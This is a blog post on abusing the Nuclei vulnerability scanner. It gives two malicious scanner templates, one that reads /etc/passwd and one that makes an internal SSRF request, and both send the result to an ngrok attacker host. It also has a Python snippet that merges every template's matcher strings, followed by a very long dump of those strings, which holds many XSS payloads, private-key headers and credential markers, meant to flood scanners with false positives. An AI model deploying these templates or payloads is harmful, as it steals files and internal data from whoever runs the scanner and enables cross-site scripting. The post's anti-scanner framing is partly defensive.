Messing Nuclei up

1632834092

Tired of kiddies messing with your servers? Tired of zillions of requests and tool-generated reports? FEAR NO MORE !

Ok , I'm kinda lazy to write lots of techinical things and be funny, so this post gonna be a dump. The tool is great btw, but is fun to mess with great things I guess.

Malicious templates

So @c3l3s14n made a malicious template that explores a RCE on the headless Chrome. Lets make more malicious templates !

Local file Read

id: lfr-poc

info:
  name: Local File Read on Nuclei with Exfiltration
  author: caioluders
  severity: critical
  description: You got it

requests:
  - method: GET
    payloads:
      passwd: /etc/passwd
    path:
      - "https://133713371337.ngrok.io/{{passwd}}"

SSRF

id: ssrf-poc

info:
  name: SSRF on Nuclei with Exfiltration
  author: caioluders
  severity: critical
  description: Makes internal request, dumps response on the attacker's server

requests:
  - method: GET
    path:
      - "http://127.0.0.1:1337/flag"
      - "http://133713371337.ngrok.io/{{base64(output)}}"
    extractors:
      - type: regex
        name: output
        part: body
        internal: true
        regex:
          - ".*"

Is this a SERVER SIDE, or Client Side? Hacker Side? The question remains...

False positive server

What if you made a server that responds all the right answers and it's vulnerable to everything?

With a little of python you can extract all the matchers and JOIN THEM !

In [11]: home_dir = os.path.expanduser('~')
    ...: 
    ...: all_templates = glob.iglob(home_dir+"/nuclei-templates/**/*.yaml",recursive=True)
    ...: for f in all_templates :
    ...:     yaml_dump = yaml.load(open(f,"r").read())
    ...:     try:
    ...:         print(''.join(yaml_dump["requests"][0]["matchers"][0]["words"]),end="")
    ...:     except :
    ...:         pass
  1. Put this string on your servers
Axis Happiness PageAxis2 Happiness PageExamining Application ServerExamining Version
    ServiceExamining System Propertiessecret_key_base =config.secret_token
    =realmresourceauth-server-url[build-system][tool.poetry]"version":"file":"sources":ionCube
    Loader Wizard# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile
    v1asserthighlightopcachemssqloci8agentIndex of /libraries/joomla/databaseParent Directory# Snyk
    (https://snyk.io) policy file, patches or ignores known vulnerabilities._links/alps/profileThis
    file is auto-generated from the current state of the database.ActiveRecord::Schema.defineWeb
    Server ConfigurationMappingMappings<FileZilla<Servers><title>Choose language |
    Drupal</title>@GLPI_LDAP
    server"uuid":"glpi":PuTTY-User-Key-FileEncryption:namedescriptionmainGeneral SettingsDatabase
    SettingsICEFLOW VPN:ICEFLOW SYSTEMICEFLOWIndex
    ofoauth-private.keyoauth-private.keyMapping=SourceTimeStamp=<phpunit</phpunit>InvalidArgumentExceptionlocal.ERRORErrorExceptionsyntax
    errorSegmentation Faultcoredumpscript headersBroken pipeArray<title>Pyramid Debug
    Toolbar</title>Pyramid DebugToolbar</a><debug><struts.actionMapping>Connecting to database
    specified by database.ymlStarted GETLANGArraySeamDebugPageorg.jboss.seamlucee.runtimeinfo it
    worked if it ends with okIMAP Error:Rails.root:Action Controller: Exception caught"GET
    /Connecting to database specified by database.ymlStarted GETError Log for<title>ZM - System
    Log</title>gateway_request_totallogback_events_total<title>Telescope</title>RequestsCommandsSchedule<title>Struts
    Problem Report</title><td><h1>Application Trace</h1></td>Squid User Access ReportSquid User's
    Access
    ReportDESCRIPTION=USER="email":"auth":data-shoppable-auth-tokenAWSEBDockerrunVersioncontainerDefinitionsPHP
    ExtensionPHP VersionPHP VersionPHP
    Extension[default]access_key<th>opcache_enabled</th><th>opcache_hit_rate</th>DeviceSubClassIPAddress[core]FTPSyncoverwrite_newer_preventiondefault_folder_permissionsProFTPDServerNameIndex
    of /.vscodecpu_seconds_total<title>Apache2::StatusPerl
    versionssh-dssssh-ed25519ssh-rsaecdsa-sha2-nistp256:{SHA}:$apr1$:$2y$ssh-dssssh-ed25519ssh-rsaecdsa-sha2-nistp256Index
    ofowncloud/config<configuration><system.webServer>[core][defaults][inventory]This file controls
    the configuration of the svnserve daemonAWSTATS CONFIGUREMAIN SETUP SECTIONBinary file
    regexps"appName":"X Prober"<title>X ProberLoadModule#
    LoadModuledsn:username:password:UserName=Password=file_permissionsextra_list_connectionsapiVersion:resources:namespace:commonLabels:KustomizationPhalcon
    FrameworkAnythingHereControllerAuthentication Web Servicehtml>"data":"status":1adminCurrent
    Network StatusDo not remove this lineconfiguration filesambahttps://@github.comFPM
    ConfigurationPool DefinitionsHostHostNameIdentityFile<title>Symfony
    Profiler</title>symfony/profiler/text/htmlparent_locationpush_location[core][api][paths]defaultwebmaster
    level 2 username guest password guestBitKeeper configurationloggingemaildescriptionIndex of
    /configsParent
    Directoryclient_idauth_uritoken_uri$_SERVER['SERVER_NAME']$_ENV['APP_SECRET']$_ENV['SYMFONY_DOTENV_VARS']JoomlaJConfig@packageNetwork
    Configurationversion:os:files:<object name="cm_md_db">containerDefinitions<string
    name="User">coremail</string><string
    name="EnableCoremailSmtp">LTYPELNAMEKEYapplication/jsonBEGIN OPENSSH PRIVATE KEYBEGIN PRIVATE
    KEYBEGIN RSA PRIVATE KEYBEGIN DSA PRIVATE KEYBEGIN EC PRIVATE KEYBEGIN PGP PRIVATE KEY
    BLOCK<user
    name=password=kind:name:steps:nameversionresources.db.params.passwordresources.db.params.usernameadapter:database:production:<title>Saia
    PCD Web
    Server</title>password=<PUSR_LIST>text/plainapiKey:authDomain:databaseURL:storageBucket:GetListResponseGetList<title>Welcome
    to your Strapi app</title>wsdl:definitionsapplication/openapi+jsonThis is simplified WADL with
    user and core resources
    onlyhttp://jersey.java.nethttp://wadl.dev.java.net/2009/02swagger:Swagger 2.0"swagger":Swagger
    UI**token**:Roundcube Webmail initial database structureDB_NAMEDB-
    Adminer</title>partial(verifyVersion,
    uid=gid=groups=<module><name><displayName><is_configurable></module>vCenter
    Server</script><script>alert(document.domain)</script>debuglogIndex
    of</script><script>alert(document.domain)</script>sqli-testattribute_countsprice_rangetermIndex
    of /.pemupdraftplus</script><script>alert(document.domain)</script>Below you should enter your
    database connection details.httpWordPress - Web publishing softwareIndex of
    /wp-content/uploads/pdf-invoicesParent
    Directory.pdf</script><script>alert(document.domain)</script>Call to undefined function
    _deprecated_file()XML-RPC server accepts POST requests
    only.DB_NAMEWPENGINE_ACCOUNT</script><script>alert(document.domain)</script>Index of
    /wp-content/plugins/super-forms/[{"<img src=x
    onerror=alert(document.domain)>":""}]facebooktwitterIndex of
    /wp-content/uploads/database-backups.sqladmin:Index of/wp-content/plugins/lifterlms/Index
    ofwp-content/plugins/iwp-client/Index of /.pubwpmudevNessusFileIncludeTestIndex
    ofwp-content/plugins/email-subscribersDB_NAMEDB_PASSWORDDB_HOSTThe base configurations of the
    WordPress<script>alert(document.domain)</script>Index ofExample Domainprotocol_versionIndex
    ofwp-content/plugins/easy-media-gallery-pro/</script><img src onerror=alert(/XSS-form/)>Index
    ofwp-content/plugins/sfwd-lms</script><script>alert(document.domain)</script>Index
    of/wp-content/plugins/elementor/<script>alert(1)</script>octet-streamtext/plainwordpress_logged_inRegister
    For This SiteE-mailIndex of/wp-content/plugins/ultimate-member/Your use of this script is at
    your sole riskWordPress AdministratorUpdate OptionsIndex of/wp-content/plugins/gtranslate/<body
    onload=alert(1)>application/jsonapplication/zip</script><script>alert(document.domain)</script>Location:
    www.pluginvulnerabilities.comIndex of/wp-content/plugins/redirection/<title>WordPress &rsaquo;
    Installation</title>Site Title[core]Index of /.sql">Nuclei - Open source project
    (github.com/projectdiscovery/nuclei)PHP VersionConfiguration CommandDB_NAMEDB_PASSWORDIndex
    of/wp-content/plugins/1-flash-galleryIndex
    ofwp-content/plugins/idx-broker-platinum/</script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORDIndex
    of/wp-content/plugins/bbpress/Referral could not be retrievedAffiliate
    CSV'>"<svg/onload=confirm('test')>Index ofwp-content/plugins/arforms/Index of
    /.txtwpdm-cacheIndex ofwp-content/themes/altairwordpress_logged_inIndex
    of/123contactform-for-wordpress</script><script>alert(document.domain)</script><title>WordPressIndex
    of/wp-content/plugins/woocommerce/javascript:alert(1)stacktrace":"java.io.IOException: No such
    file or directoryhttpPHP ExtensionPHP VersionPHP LicensePHP VariableshttpXPATH syntax error:
    '\ZSL1ZSL'alert(document.domain)//&et=ServerErrormail/bootr.ashxint(54289)struts-default.xmllast_build_numberbuild_name<web-app</web-app>[Edition][LocalInfo]bit
    app
    supportfontsextensionsClientncwslogin.jspadmin.jspc5b3d7397a90f42d222f7ed9408c0dc6Content-Type:
    text/htmlhttp1788906filename="config.text"Content-Type: application/octet-streamCouchDB/Erlang
    OTP/https://{{randstr}}.tld/__session_start__/openvpn_sess$_GET['css']User {{randstr}}
    successfully added to DatabaseLAGOS PARKERLogin Successfullylocation.href =
    'index.php';onmousewheel=\"return
    bbimg(this)\"<rootManagerName><rootManagerPassword>attachmentapplication/x-msdownload38ee63071a04dc5e04ed22624c38e648agenda_js.php?type=xss"
    onmouseover=alert(document.domain)/upload_tmp_dir/Kafdrop<img src=x onerror=alert(2)>Server:
    viewLinc/5.1.2.367Set-Cookie: crlfinjection=crlfinjection<img src=c
    onerror=alert(8675309)><usrID><sessionID>taskResponseThe source URL is not
    validdnse0ec043b3f9e198ec09041687e4d4e8d</script><script>alert(document.domain)</script>http"url":"http:"success":1<?xml
    version="1.0"?><x:script
    xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain&#x29;</x:script>httpcon_db_passcon_db_namegke-remotephpinfoPHP
    Version52c69e3a57331081823331c4e69d3f2ehttp"><script>alert(document.domain)</script>Location:
    https://evil.comjava.lang.NullPointerException:nullMicrosoft Windows
    [Version"><script>alert(document.domain)</script>/Success.htm"cf_main_cf"
    src="javascript:alert(1)"application-idmaximum-resource-capability"value":"disable":falsetexttext/html"state":"SUCCESS"扫描后门反弹端口文件管理Cod::respond()<title>Insert
    Image</title><title>Image
    Gallery</title>"name":"length":"filePath":"list":e807f1fcf82d132f9bb018ca6738a19f</iframe><svg/onload=alert("{{randstr}}")>{{randstr}}<form
    action="javascript:alert/tmp/www/<script>alert(document.domain)</script>jaxbDirectoryContentsuser-pickersignup.validation.errorsprojectsstartAtmaxResultsselfdescriptionnamedashboardsstartAtmaxResultskeylinklabelselfselfdescriptionnameAdminer'>"<svg/onload=confirm('q')>'>"<svg/onload=confirm('s')>'>"<svg/onload=confirm('search')>'>"<svg/onload=confirm('id')>'>"<svg/onload=confirm('action')>'>"<svg/onload=confirm('keyword')>'>"<svg/onload=confirm('query')>'>"<svg/onload=confirm('page')>'>"<svg/onload=confirm('keywords')>'>"<svg/onload=confirm('url')>'>"<svg/onload=confirm('view')>'>"<svg/onload=confirm('cat')>'>"<svg/onload=confirm('name')>'>"<svg/onload=confirm('key')>'>"<svg/onload=confirm('p')>{{randstr}}.tldbit
    app supportfontsextensionshttp"><injectable>httpDashboard
    [Jenkins]java.lang.StringIndexOutOfBoundsExceptionString index out of range<title>People -
    [Jenkins]</title>println(Jenkins.instance.pluginManager.plugins)Scriptconsole</script><script>alert(document.domain)</script><svg/onload=alert('{{randstr}}')>application/jsonPHP
    ExtensionPHP VersionPHP ExtensionPHP VersionPHP ExtensionPHP VersionSQLSTATEXPATH syntax
    erroradmin@joomla.orgwww.joomla.orgwindow.addEventListener(This files describes API changes in
    core libraries and APIs,information provided here is intended especially for developers.new my
    moodle and profiles APIapplinksappIDpaths# @package    JoomlaOpen Source Matters. All rights
    reservedarn:aws:ecsDisallow:RewriteRule</IfModule><IfModuleYou want to configure phpMyAdmin
    using web interface<access-policy><cross-domain-access>domain
    uri=.xsdSchemasinterest-cohort=()TRACE / HTTP2021Directory listing forIndex of /[To Parent
    Directory]Directory: /<title>Polycom Login</title><title>Weave
    Scope</title>__WEAVEWORKS_CSRF_TOKEN__CSRF_TOKEN_PLACEHOLDER__Epson
    Connect/IMAGE/EPSONLOGO.PNG<title>Synnefo Admin</title>Powered by
    GoAnywhereGoAnywhere.com<title>Apache Flink Web Dashboard</title><title>H2 Console</title>Epson
    Web ControlBasic ControlAdvanced<!--for router status
    S-->{"code":200,"progress":null,"status":"ready"}<title>Installation</title>WebLaunch/auth/realms/apimanWorkspaceLoginAirWatch<title>Grafana</title>LoginBrowseWelcome
    Guest<title>SSL VPN Service</title>Self-Service
    ConsoleRSAAM_Self_Service_Consoleconsole-selfserviceSaferoads
    VMSGitLabhttps://about.gitlab.comGitHub · Enterprise<title>Cerebro</title>NetScaler
    AAA</title><title>CrushFTP WebInterface</title><th>System Manager
    ID:</th>/sap/hana/xs/formLogin/images/sap.png<title>Sophos</title>hitron$.hitron.languages.lang_init();<title>zabbix-server:
    Zabbix</title><title id="page_title">Sign in to Cisco Finesse</title><title>Call Break
    CMS</title><title>XenForo</title>/remote/fgt_lang<title>GXD5 Pacs Connexion
    utilisateur</title><title>Atlassian Crowd - Login</title><title>Kafka Topics UI - Browse Kafka
    Data</title><title>Acunetix</title><acx-root></acx-root><title>WeatherLinkIP
    Configuration</title>Project Management Software<title>Citrix Gateway</title><title>Virtual
    Office</title><title>CRXDE Lite</title>phpPgAdminbrowser.phpintro.php<a
    href="http://www.keycloak.org">keycloak<title>Oracle(R) Integrated Lights Out Manager -
    Login</title><title>MinIO Browser</title><title>Minio Browser</title><title>Tuxedo Connected
    Controller</title><title>Cortex XSOAR</title><title>Oracle Commerce Business Control
    Center</title>Sign in [Jenkins]<title>XenMobile - Console - Logon</title>WordPress</title>Log
    In</title>/wp-login.php?action=lostpassword">Lost your password?</a><form name="loginform"
    id="loginform" action="{{BaseURL}}/wp-login.php" method="post"><title>Ansible
    Tower</title>ansible-main-menuX-Mod-PagespeedWEB Local Craft Terminal<h2>Welcome to the Apache
    ActiveMQ!</h2><title>Apache ActiveMQ</title>/dana-na/auth/welcome.cgi<title>GLPI -
    Authentication</title>title="Powered by Teclib and contributors" class="copyright">GLPI
    Copyright<title>Bazarr</title><title>Vigor Login Page</title>Azkaban Web ClientNginx Proxy
    Manager</title><title>RocketMq-console-ng</title>Welcome to iTopiTop loginOne Identity Password
    Manager<title>SonicWall - Authentication</title>SonicWall AdministratorAkamai Inc. All rights
    reservedAkamai CloudTest<title>ClearPass Policy Manager - Aruba Networks</title><title
    ng-bind="$root.title">Keenetic Web</title>ng-app="faradayApp">Nomadnomad-ui<title>User
    AuthenticationWatchGuard Technologies<title>Idera Server Backup Manager SE  </title><title>Cisco
    Integrated Management Controller Login</title>Login - Adminer<title>Honeywell XL Web
    Controller</title><title>TOS Loading</title>If this device is not in your possession, please
    contact your local network administrator.mikrotik.comJBoss JMX Management Console<title
    id="PageTitle">Password Management Client</title>Oki Data Corporation<title>Netscaler
    Gateway</title>Telerik.Sitefinity.Web.UI.UserPreferencesAvatier
    Corporation<title>phpMyAdminpmahommeCouchDB/Erlang OTP/<title>XVR LOGIN</title><title>Prometheus
    Time Series Collection and Processing Server</title><title>AP setup</title><title>Solr
    Admin</title><title>Sidekiq</title>ShareCenterPlease Select Your
    Account<title>SonarQube</title>No administrator account found inside the database<title>Dell
    OpenManage Switch Administrator</title>username="tomcat"
    password="s3cret"manager-gui<title>Ambari</title>href="http://www.apache.org/licenses/LICENSE-2.0"hadoopresourcemanagerlogged
    in as: dr.who<title>SGP</title>CirCarLife Scada<div
    class="navbar-brand">Hadoop</div><title>Radius Manager - User Control
    Panel</title><title>Nutanix Web Console</title><li>LabTech</li><form
    action="/WCC2/Search/search" id="searchForm method="post"><h1> Welcome to the LabTech Web
    Portal</h1>Universal Agent UninstallerTechnician Login<form action="/WCC2/Home/Login"
    autocomplete="off" method="post"><title>GlobalProtect Portal</TITLE><msg>Invalid
    parameters</msg><title>D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME</title><title>D-LINK
    SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME</title>/signon.html<meta HTTP-EQUIV='Refresh'
    CONTENT='1Home motion by SomfyWebalizer VersionUsage statistics for<title>Okta - Sign
    In</title>fioriLoginaction="/fiori"Kubernetes Dashboard</title><title>FCKeditor<title>CKEditor
    Samples</title>http://ckeditor.com</a>Custom Uploader URL:init_spell()'tip':'<title>WHM
    Login</title><title>R WebServer</title><title>Sign In-SuperVPN</title><title>seats.io  |
    login</title>OpenNMS Web Console<title>dotCMS Content Management Platform</title>RabbitMQ
    Management<title>Odoo</title><title>Icinga Web 2
    Login</title>_ctxstxt_CitrixCopyright<title>GLPI - Аутентификация</title>GLPI
    Copyright<title>ColdFusion Administrator Login</title><title>FastAPI - Swagger
    UI</title><title>FastAPI - ReDoc</title>{"title":"FastAPI"<title>Pandora FMS mobile</title><meta
    name="generator" content="Joomla! - Open Source Content Management"
    />/administrator/templates/isis/images/joomla.pngid_LaCiehudson.model.HudsonSet-Cookie:
    CmWebAdminSessionSolarWinds Orion<title>Login - OpenStack Dashboard</title>Apache Tomcat<a
    href="/admin/">Django administration</a><title>Selenoid UI</title>/manifest.json<title>Total Web
    Solutions</title><meta name=description content="Traefik UI"><title>Splunk SOAR</title>Your
    client connectionThis security appliance is directly connected to a local network<title>Project
    Fauxton</title>webpackJsonpzipkin-lens<title>WSO2 Management Console</title><title>Login - Lucee
    Web Administrator</title><title>Login - Lucee Server Administrator</title><title>Strapi
    Admin</title><title>Wowza Streaming Engine Manager</title><!-- graph table begins -->Global
    kernel usage</b>Kernel usage per processor</b><!-- graph table ends -->1day.png'<title>VMware
    Horizon</title><TITLE>CoDeSys WebVisualization</TITLE>webvisu.jar,minml.jar<title>frps
    dashboard</title>Camunda Welcome<title>F-Secure Policy Manager
    Server</title><title>SAP&#x20;NetWeaver&#x20;Portal</title>MongoDB Ops Manager</title><title>WEB
    SERVICE</title><base href="/secadmin/"><title>WebMail login: totemomail®
    WebMail</title><title>Sphider Admin Login</title><title>SiteOmat
    Login</title>USER_LOGIN/bitrix/js/main/"sessionName":"zentaosid"{"version":"<title>Log in -
    Plastic SCM</title>>KafkaMonitor</a>>Kafka Monitor GUI</h1>Plesk
    Onyx<title>Logon</title>fioriLoginactive_admin_contentactive_admin-About VMware
    AirWatch/CxWebClient/webApp/Scripts/libs/authenticationScriptsAirflow - LoginPowerLogic
    ION<title>Blue Iris Login</title>src="/druid.js"href="/druid.css"<title>Server Backup Manager SE
    </title><title>Sauter moduWeb - Login</title>Welcome to Zenphoto! This page will set up
    ZenphotoExporter/metrics<title>Advanced Setup - Security - Admin User Name &amp;
    Password</title>ZTE Corporation. All rights reserved. </div><form name="fLogin" id="fLogin"
    method="post"  onsubmit="return false;" action=""><title>Parallels HTML5
    Client</title><title>OctoPrint Login</title><title>Wyse Management Suite</title>Plesk
    Obsidian<title>JFrog</title>Kronos Workforce CentralRStudioMobileIron Admin PortalMobileIron
    User PortalMobileIron RegistrationMobilizing enterprise applicationsWelcome to
    WildFly<title>Identity Services Engine</title>g_i3gStateg_sysinfo_sim_stateg_iUIDPlease
    loginftnt-fortinet-gridmain-fortiweb.css<title>Miniweb Start Page</title><title>CX
    Cloud</title><title>Kafka Connect
    UI</title>csod-customcsodcommon<title>MantisBT</title>HiveManager Loginhybris Management
    Console<title>Login to Webmin</title><title>GetSimple &raquo; Installation</title>PHP
    Version<title>Symantec Data Loss Prevention</title><TITLE>PGP Global
    Directory</TITLE><title>Symantec Endpoint Protection Manager</title><TITLE>Symantec Encryption
    Server: Web Email Protection - Login</TITLE><title>ManageEngine Analytics
    Plus</title><title>ADSelfService Plus</title><title>ManageEngine ServiceDesk
    Plus</title><title>ManageEngine SupportCenter Plus</title><title>APEX IT Help
    Desk</title><title>ManageEngine AssetExplorer</title><title>Applications Manager Login
    Screen</title><h2>OpManager Plus<span><title>ManageEngine Desktop Central
    10</title><title>ManageEngine - ADManager Plus</title><title>IBM iNotes Login</title><title>IBM
    Security Access Manager</title><title>AEM Sign In</title><title>Adobe Connect Central
    Login</title><title>Component Browser Login</title><title>Adobe Media
    Server</title><title>Internet Services</title><TITLE>Network Camera</TITLE>webcams and ip
    cameras server for windowsMOBOTIXhttpDevice Informationhp<title>NUUO Network Video Recorder
    Login</title><TITLE>LUTRON</TITLE>>DeviceIP</A>>Get Database Info as XML</A>Live view  -
    AXIS<title>BEMS</title>../http/index.phpBEGIN RSA PRIVATE KEYHP LaserJet ProfessionalBrother
    IndustriesNetwork StatusBrother Industries<TITLE>Panasonic Network Camera Management
    System</TITLE><title>ePMP</title>SeleaCPSHttpServerselea_httpdHttpServer/0.1MJPG-Streamer/0.2<title>ContaCam</title>But
    if you're looking to build your own websiteyou've come to the right place.Ошибка 402. Сервис
    Айри.рф не оплаченOops.</h2><p class="text-muted text-tight">The page you're looking for doesn't
    exist.This account no longer activeNo Site For Domainthis help center no longer existsNo
    settings were found for this company:404 - Page Not FoundStart Your New Landing Page
    Now!pagewiz<strong>Trying to access your account?</strong>or <a
    href="mailto:[email protected] looks like you may have taken a wrong turn somewhere. Don't
    worry...it happens to all of us.Profile not foundHmmm....something is not right.404 - Page Not
    FoundOops looks like you got lostDo you want to register.wordpress.com</em>
    doesn&#8217;t&nbsp;existIf you need immediate assistance, please contact <a
    href="mailto:[email protected]<div class="notfound">404 Not Found<br>Project doesnt exist...
    yet!There is no helpdesk here!Maybe this is still fresh!Whatever you were looking for doesn't
    currently exist at this address.There's nothing here.We're sorry, you've landed on a page that
    is hosted by Flywheel<h1>Oops! That's not the site<br>you're looking&nbsp;for.</h1>Repository
    not found<h1>Error 404: Page Not Found</h1>Unrecognized domain <strong>Company Not FoundThere is
    no such company. Did you enter the right URL?Not found - Request ID:project not foundAlias not
    configured!Admin of this Helprace account needs to set up domain aliasWith GetResponse Landing
    Pages, lead generation has never been easierhttps://www.wishpond.com/404?campaign=true404: This
    page could not be found.404 Blog is not foundOops - We didn't find your site.If you're moving
    your domain away from Cargo you must make this configuration through your registrar's DNS
    control panel.We can't find this <a href="https://simplebooklet.comunknown to Read the DocsThe
    feed has not been found.<p class="description">The page you are looking for doesn't exist or has
    been moved.</p>The specified bucket does not existThere is no portal here ... sending you back
    to Aha!ngrok.io not foundTunnel *.ngrok.io not foundThis page is reserved for artistic dogs.<h1
    class="headline">Uh oh. That page doesnt exist.</h1>If this is your website and you've just
    created it, try refreshing in a minuteNon-hub domain, The URL you've accessed does not provide a
    hub.Sorry, this shop is currently unavailable.To finish setting up your new web address, go to
    your domain settings, click "Connect existing
    domain"data-html-nameherokucdn.com/error-pages/no-such-app.html<title>No such
    app</title>{"text":"Page Not Found"Please go to the site settings and put the domain name in the
    Domain tab.Looks like you've traveled too far into cyberspace.offline.ghost.org<h1>Oops! We
    couldn&#8217;t find that page.</h1>Public Report Not ActivatedThis public report page has not
    been activated by the userSorry, this page is no longer available.We could not find what you're
    looking for.Domain not founddoes not exist in our systemis not a registered InCloud
    YouTrack.Building a brand of your own?to target URL: <a href="https://tictail.comStart selling
    on Tictail.There isn't a GitHub Pages site here.For root URLs (like http://example.com/) you
    must provide an index.html fileThe gods are wise, but do not know of the site which you seek.Job
    Board Is UnavailableThis job board website is either expiredThis job board website is either
    expired or its domain name is invalid.<p class="bc-gallery-error-code">Error Code: 404</p>Error
    404 - AnnounceKitYou have logged in as 'admin'ZMC - Backup Set ManagementYou should be
    redirected automatically to target URL: <a
    href="/">/</a>/super/index.html"code":200"msg""content"accessTokenapplication/jsonSet-Cookie:
    ECOMSecurity/console/index.jspADMINCONSOLESESSION"Users" :
    {AMBARI.grafana_sessiontext/html"username":"showdoc""user_token":/carbon/admin/index.jsp?loginStatus=trueJSESSIONID"session.id""success""success"Set-Cookie:
    SUPPORTSESSIONIDdocument.formParent2.changepasswd1.valuepasswd_change.ehpofbiz-pagination-template<span>Powered
    by OFBiz</span>session_id=resourceapplication/json<META HTTP-EQUIV=REFRESH
    CONTENT="0;URL=/index.htm">urn:schemas-microsoft-com:vml<title>GLPI - Standard
    Interface</title>Set-Cookie: adminSet-Cookie:
    PHPSESSIDzabbix.php?action=dashboard.viewtext/html"message": "success""username": "admin""type":
    "login"application/jsonLocation: /index.php?action=admin.index&host=0Set-Cookie:
    ROCK_LANG="username""authToken""guacadmin"Content-Type: application/json/0/ConsoleProperty of
    IBM<h1>Welcome to Axis2 Web Admin Module
    !!</h1>session=./admin/<title>Redirecting...</title><h1>Redirecting...</h1<a
    href="/">spectracomdeletedWelcome to the Apache ActiveMQ Console of
    <b><h2>Broker</h2>proxies</script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORDDB_HOSTThe
    base configurations of the
    WordPress<script>alert(1)</script></script><script>alert(document.domain)</script></script><script>alert(document.domain)</script><web-app</web-app>text/html"></script><script>alert(document.domain)</script>httphttphttparray(2)Position:
    ||whoami||roothttp<img src=x
    onerror=alert(document.domain)></script><script>alert(document.domain)</script>Too many
    connections<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content
    frame">application/x-hessianemail.smtp_host.securedemail.smtp_password.securedemail.smtp_port.securedemail.smtp_username.secured{"type":"success","message":"File
    removed successfully"}Admin
    Consoletext/html</title><script>alert(31337)</script>"/></script><script>alert(document.domain)</script>Content-Type:
    application/jsonartica-applianc[extensions]httpContent-Type: application/jsontotalinternal
    server error<div id="adminmenumain" role="navigation" aria-label="Main
    menu"><h1>Dashboard</h1>application/xmlhttp"dag_run_url":"dag_id":"items":<script>document.title
    = "";alert(document.domain);" -
    Jeedom"</script>INTERNAL_PASSWORD_ENABLEDCONF_VIRTUAL_KEYBOARD<h1>sample3.10.4.720583.12.4.765443.8.2.672957.0.2.810057.2.7.869747.4.3.897857.6.4.943917.8.2.978268.0.6.1054088.2.2.1072858.4.3.1116148.6.3.1161758.8.1.1189139.0.3.1246209.2.0.1279409.4.3.1376849.6.7.1459499.8.4.14916619.03.3.15216619.06.4.15711819.09.4.019.12.2.020.03.2.020.06.3.0vbulletinrcetext/html<svg/onload=alert(/{{randstr}}/)>poc-testingnonexistentname=pass=Welcome
    to kongconfigurationkong_env<script>alert("XSS")</script>httphttpfaultStringNo such service
    [ProjectDiscovery]methodResponsewebvpnWebvpnPHP ExtensionPHP
    Versionhttp<svg/onload=alert(document.domain)>:Envelope:Body:getAllAgentInfoResponseUser does
    not existfunction(handler){};function
    __MobileAppList(test){alert(document.domain);};//</div><img src=x
    onerror=alert(123);>catch-breadcrumb<jnlp codebase="nonexistent.1337">Burp Collaborator
    Server<script>alert(document.domain)</script><svg/onload=alert(xss)>http<script>alert('xss')</script>searchersgroupsIndex
    of /pme/mediaParent
    Directorypoc.txtadded</script><script>alert(document.domain)</script>add-category.phpget book
    price failed! You have an error in your SQL syntaxCan't retrieve data You have an error in your
    SQL
    syntaxdns</script><script>alert(document.domain)</script>10.3.6.012.1.3.012.2.1.312.2.1.4http</script><script>alert(document.domain)</script>Location:
    https://example.com</script><script>alert(document.domain)</script>SQL STATEMENT:<TD>UPDATE
    login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE
    UPPER(USERNAME)=UPPER(NULL)or\`1\`=\`1\`;--
    -')</TD>CTCWebServiceSiSOAP-ENVSolarWinds.Orion.Core.<svg/onload=alert(1)>DatabaseError
    atORA-29257:ORA-06512:Request Method:</script><script>alert(document.domain)</script>var
    ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//<li
    class='file ext_passwd'><a rel='/passwd'>passwd</a></li>iLO
    User</script><script>alert(document.domain)</script>httphttp6dd70f16549456495373a337e6708865[extensions]for
    16-bit app supportright">Router\s*Admin\s*Username<right">Router\s*Admin\s*Password<Debugging
    informationcom.thoughtworks.xstream.converters.collections.MapConverterX-Hacker: Bounty
    Plzapplication/json</script><script>alert(document.domain)</script><script>alert("{{randstr}}")</script>AvantFAXMogwailabs:
    CHECKCHECKcf79ae6addba60ad018347359bd144d2<img src=x onerror=alert(document.domain)>Failed to
    add new collection48dbd2384cb6b996fa1e2855c7f0567fnoresize
    src="/\example.com?configName=Content-Type:
    text/htmlClassCastException<script>alert(document.domain)</script><firmwareVersion>http</script><script>alert(document.domain)</script>application/jsonLocation:</script><script>alert(document.domain)</script>@start@Success@end@projectdiscovery.iohttphttp</script><script>alert(document.domain)</script>/sbin/nologin<input
    type="hidden" name="account_update_token"
    value="([a-zA-Z0-9_-]+)"rdspassword=encrypted=<script>alert('xss')</script>httpid="sell-media-search-text"
    class="sell-media-search-text"alert(1337)"username": "access-admin"><img src=x
    onerror=alert(1)>>)1(trela=rorrenoTmVzc3VzQ29kZUV4ZWNUZXN0</script><script>alert(document.domain)</script>http</script><script>alert(document.domain)</script>seriesListroot:*:bin:*:for
    16-bit app
    supportuid=gid=</script><script>alert(document.domain)</script><svg/onload=alert(xss)></script><script>alert(document.domain)</script>[global]username
    has already been usedLocation: /api/users/httpTypes of profiles available:Profile
    DescriptionsdeleteKey<a
    href="/\google.com/evil.html">";alert('1');//<title>Welcome</title>http~lansweeperdb~</script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORDorg.jivesoftware.database.EmbeddedConnectionProviderMost
    properties are stored in the Openfire
    database<script>alert(1)</script><svg/onload=alert(1)>phpmyadmin.netphpMyAdminfoo"></script><script>alert(document.domain)</script>"</script><script>alert(document.domain)</script>phpinfoPHP
    Version</script><script>alert(document.domain)</script>soapenv:Envelope<span
    data-filter-field="owner-full-name"><title>Manage Filters -
    Jira</title>4220397236httpnuclei16384the user does not existhttpNameEmailStatusCreated
    On</script><script>alert(document.domain)</script>downmix.inc.phpCall to undefined function
    helper()</script><script>alert(document.domain)</script>DB_NAMEDB_PASSWORD</script><script>alert(document.domain)</script>Configuration
    has been altered</script><script>alert(document.domain)</script>CirCarLife
    Scadahttp31333333337"message":"An internal server error occurred"CirCarLife
    Scadanuclei-template</script><script>alert(document.domain)</script>var fgt_langThe base
